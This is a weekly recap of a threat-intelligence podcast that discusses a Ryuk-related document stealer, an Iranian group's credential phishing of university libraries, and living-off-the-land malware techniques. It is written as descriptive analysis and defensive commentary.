Coming up this week on Breaking Badness. Today we discuss: This Threat Actor Has a Good Left Ryuk, Not So Great Expectations, and Living off the LAN.
Here are a few highlights from each article we discussed:
This Threat Actor Has a Good Left Ryuk
- This piece of malware operates behaviorally like what we see from a lot of ransomware, where a process kicks off and crawls the user’s home directory looking for specific file extensions. Normal ransomware would then initiate it’s encryption routine for each of those files and drop a ransom note on the users desktop.
- This is the point where this malware differentiates itself, and filters for document files like Excel and Word. Once the malware finds those documents, it does another unique behavior: it looks for string matching for specific sensitive keywords. Words like “financial, military, secret, tank, contract”. If a match occurs, than the files are FTP transferred to an attacker FTP IP address.
- It’s interesting to see malware leverage really old protocols like FTP nowadays, especially because we have an attacker that’s trying to capture sensitive data but transmitting it over non-sensitive channels.
- I think this malware really reeks of code reuse from Ryuk and an unsophisticated threat actor. The malware specifically looks for Ryuk ransomware artifacts to see if its been infected previously, things like the “.RYK” file extension and the ransomware note dropped with Ryuk in the name.
- I think the motive is really obvious that these threat actors are trying to gather sensitive documents, but what their purpose is I’m not sure right now. I really want to take a thread and investigate the FTP infrastructure more.
- I firmly believe a majority of attackers are lazy, and copy-pasting / re-using code snippets can get the job done. I don’t think this is a case of the Ryuk authors changing their motives or direction at all.
- Attackers were targeting the top baby names of 2018 in the US. I’m not sure if this would add signal or add more noise for data exfiltration operations.
- This malware doesn’t leverage a particular exploit, so we can assume that all the common mediums apply here: Trojanized applications on the Internet, malicious emails etc.
- To an organization, not that concerning *if you have the proper fundamental controls in place*.
- If you aren’t looking for FTP egress and or have a decent AV, then you’re risk is much higher for a bad PR incident when your sensitive data is leaked.
Not So Great Expectations
- Cobalt Dickens is associated with the Mabna Institute, which is a private government contractor based in the Islamic Republic of Iran that works for the Iranian government. In March 2018, the FBI indicted 9 individuals from this organization for intrusion, wire fraud, and aggravated identity theft on behest of the Iranian government.
- Their targets have included 144 universities in the United States, 176 foreign universities in 21 countries, five federal and state government agencies in the United States, 36 private companies in the United States, 11 foreign private companies, and two international non-governmental organizations.
- You’d think they’d stop there. However, in August 2018 Secureworks released a report stating that they had evidence to suggest that the group had not stopped; in fact they had continued targeting 76 universities in 14 countries using similar tactics as before in an effort to steal credentials.
- Their recent campaign included domains acquired from Freenom, which is a domain provider that administers some free TLDs: .ml. .ga, .cf, .gq, and .tk.
- Here is some research carried out regarding Freenom and other free domain providers.
- The sites that this group had registered also had valid SSL certs, which made them seem much more authentic. They were issues by Let’s Encrypt, which does a lot of free SSL certs. Free domains and free SSL certs can be a good thing for legitimate sites that need them, but this campaign seems to be a good example of how they can be abused and used for nefarious purposes.
- The group really stuck to their core mission on this one and targeted universities, as we’ve seen them do multiple times before. This time, they targeted 60 universities in Australia, the United States, the United Kingdom, Canada, Hong Kong, and Switzerland. All in all (including previous campaigns), this group has been identified targeting at least 380 universities in over 30 countries. Many universities have been targeted multiple times.
- It seems this group frequently targets these universities’ library systems, which leads researchers to believe they may be trying to get their hands on intellectual property or other research conducted by these universities.
- Since they are conducting their operations on the behest of the Iranian government, they are likely targeting information that would be of use for the government, such as items that may be used for weapons or defenses, transportation, or international relations publications.
- I don’t have any evidence of what types of research specifically they were targeting with each attack, but those types would be my educated guess.
- The group used compromised university systems to send library-themed phishing emails, which contained links to spoofed login pages for resources associated with the targeted universities. This phishing campaign was actually pretty similar to previous campaigns in 2018, except previous campaigns used shortened links to obscure the attackers’ infrastructure, whereas these messages contain the spoofed URLs.
- Once users click on the malicious link, they are led to a page designed to resemble the legitimate library website and that asks for their credentials. The credentials they enter are saved to a txt file to be accessed by the actor later, and the user is redirected to the legitimate library page.
- The March 2018 indictment had no impact on this group or their operations. They have not even changed tactics, let alone stopped their campaigns. However, on a positive note, many universities are implementing MFA to help mitigate the threat from this group. Even if the group gets username and password, having MFA will help prevent them from being able to log in and steal IP or other information.
Living off the LAN
- A malware trend that caught my eye is Living Off the Land Techniques – These continue to be my favorite trends in the malware space. The challenge to us that do malware investigations and research is we have benign, allowlisted and digitally signed processes doing malicious things. The challenge here from a blue team perspective is enormous.
- One of my favorites is leveraging the Microsoft ‘certutil’ binary as a legitimate stager to download and execute base64 encoded malware implants from an actual URL. All natively baked into Windows.
- The article references Turla Attacks, which we covered in a previous episode (episode 18) so for full commentary, check that out. For the Spark Notes version – Turla (a well known Russian APT group) apparently took over infrastructure previously used by OilRig (a well known Iranian APT group) and used it in their campaign.
- The article notes that the group used a mix of custom and publically available hacking tools and legitimate admin software, moving towards Tarik’s favorite technique of living off the land. In this instance we saw Turla using PowerShellRunner, which is a publicly available tool used to execute PowerShell scripts without using powershell.exe (among other tools such as Meterpreter).
This Week’s Hoodie/Goodie Scale
This Threat Actor Has a Good Left Ryuk
[Tarik]: 2/10 Hoodies
[Emily]: 2/10 Hoodies
Not So Great Expectations
[Tarik]: 4/10 Hoodies
[Emily]: 6/10 Hoodies
Living off the LAN
[Tarik]: 8/10 Hoodies
[Emily]: 7.5/10 Hoodies
That’s about all we have for this week, you can find us on Twitter @domaintools, all of the articles mentioned in our podcast will always be included on our podcast recap. Catch us Wednesdays at 9 AM Pacific time when we publish our next podcast and blog.
*A special thanks to John Roderick for our incredible podcast music!
